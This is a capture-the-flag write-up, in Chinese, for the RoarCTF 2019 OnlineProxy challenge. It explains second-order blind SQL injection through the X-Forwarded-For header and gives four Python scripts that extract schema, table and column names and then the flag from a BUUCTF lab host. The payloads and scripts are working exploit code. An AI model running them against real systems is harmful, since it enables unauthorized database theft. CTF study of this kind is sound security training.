[RoarCTF2019]OnlineProxy

这里发现，通过修改 X-FORWARDED-FOR 的值，注释部分的内容也随之改变。

尝试盲注：上传命令时，第一次作为 Current Ip 并不能执行；再次上传时，上次的 Current Ip 变为 Last Ip，也没有执行；再次 send 即可正常执行命令。

简单尝试使用盲注得到所有库名，这里可以看到该方法是没问题的。

爆破库名:

0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1 or '0
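import requests

# Target and request template as given in the write-up; X-Forwarded-For is the
# header whose value is reflected into the page and used as the injection point.
url = "http://node4.buuoj.cn:26869/"
head = {
    "GET": "/ HTTP/1.1",
    "Cookie": "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
    "X-Forwarded-For": "",
}
result = ""
# Boolean probe on the i-th character of the concatenated schema names: the
# whole expression evaluates to 1 or 0, and the page shows it as "Last Ip: 1"
# or "Last Ip: 0".  The same string was previously duplicated inline twice.
payload = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0"
for i in range(1, 100):
    l = 1
    r = 127
    mid = (l + r) >> 1
    while l < r:
        # As noted above, a header value is only evaluated once it has moved
        # from "Current Ip" to "Last Ip", hence one post at mid and two at
        # mid+1; only the body of the last post is inspected.
        head["X-Forwarded-For"] = payload.format(i, mid)
        html_0 = requests.post(url, headers=head)
        head["X-Forwarded-For"] = payload.format(i, mid + 1)
        html_0 = requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    # NOTE(review): past the end of the string substr() yields '' and
    # ascii('') is 0 in MySQL, so the search converges on 1 rather than on
    # a space; this break may never fire — confirm against real output.
    if chr(mid) == ' ':
        break
    result += chr(mid)
    print(result)
# Fixed label: this script enumerates schema names, not table names.
print("schema_name:" + result)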

爆破表名:

爆破表名:

0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),1,1))>1 or '0
import requests

url = "http://node4.buuoj.cn:26869/"
head = {
    "GET": "/ HTTP/1.1",
    "Cookie": "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
    "X-Forwarded-For": "",
}
result = ""
# Probe on the i-th character of the concatenated table names of one schema.
# 0x46346c395f4434743442343565 is the schema name found in the previous step
# ("F4l9_D4t4B45e") written as a hex literal so the payload needs no quotes.
urls = "0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"


def send(value):
    """Post one request with *value* in X-Forwarded-For and return the body text."""
    head["X-Forwarded-For"] = value
    return requests.post(url, headers=head).text


for i in range(1, 100):
    lo, hi = 1, 127
    mid = (lo + hi) >> 1
    while lo < hi:
        # As described above, a header value is only evaluated once it has
        # moved from "Current Ip" to "Last Ip": post once at mid, twice at
        # mid+1, and look only at the final body.
        send(urls.format(i, mid))
        send(urls.format(i, mid + 1))
        body = send(urls.format(i, mid + 1))
        if "Last Ip: 1" in body:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) >> 1
    # A space is treated as the end of the concatenated list.
    if chr(mid) == ' ':
        break
    result += chr(mid)
    print(result)
print("table_name:" + result)

查列名:

0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),1,1))>1 or '0
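import requests

url = "http://node4.buuoj.cn:26869/"
head = {
    "GET": "/ HTTP/1.1",
    "Cookie": "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
    "X-Forwarded-For": "",
}
result = ""
# Probe on the i-th character of the concatenated column names.  Note this
# filters by table_schema (the hex literal is "F4l9_D4t4B45e"), not by
# table_name as the screenshot payload above does, so columns of every table
# in that schema are concatenated together.
urls = "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1, 100):
    l = 1
    r = 127
    mid = (l + r) >> 1
    while l < r:
        # A header value is only evaluated once it has moved from "Current Ip"
        # to "Last Ip" (see the note above): one post at mid, two at mid+1,
        # and only the last body is checked.
        head["X-Forwarded-For"] = urls.format(i, mid)
        html_0 = requests.post(url, headers=head)
        head["X-Forwarded-For"] = urls.format(i, mid + 1)
        html_0 = requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    # NOTE(review): beyond the end of the string ascii(substr(...)) is 0 in
    # MySQL, so the search converges on 1, not on a space — this break may
    # never fire; confirm against real output.
    if chr(mid) == ' ':
        break
    result += chr(mid)
    print(result)
# Fixed label: this script enumerates column names, not table names.
print("column_name:" + result)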

查Flag

0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),1,1))>1 or '0
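import requests

url = "http://node4.buuoj.cn:26869/"
head = {
    "GET": "/ HTTP/1.1",
    "Cookie": "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
    "X-Forwarded-For": "",
}
result = ""
# Probe on the i-th character of a single row of F4l9_C01uMn.  Unlike the
# screenshot payload above (group_concat of the whole column), this reads the
# second row only ("limit 1,1" skips one row).
urls = "0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1, 100):
    l = 1
    r = 127
    mid = (l + r) >> 1
    while l < r:
        # A header value is only evaluated once it has moved from "Current Ip"
        # to "Last Ip" (see the note above): one post at mid, two at mid+1,
        # and only the last body is checked.
        head["X-Forwarded-For"] = urls.format(i, mid)
        html_0 = requests.post(url, headers=head)
        head["X-Forwarded-For"] = urls.format(i, mid + 1)
        html_0 = requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    # NOTE(review): beyond the end of the string ascii(substr(...)) is 0 in
    # MySQL, so the search converges on 1, not on a space — this break may
    # never fire; confirm against real output.
    if chr(mid) == ' ':
        break
    result += chr(mid)
    print(result)
# Fixed label: this script reads the flag row, not table names.
print("flag:" + result)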

参考链接:[BUUCTF–RoarCTF 2019]Online Proxy_onlineproxy ctf-CSDN博客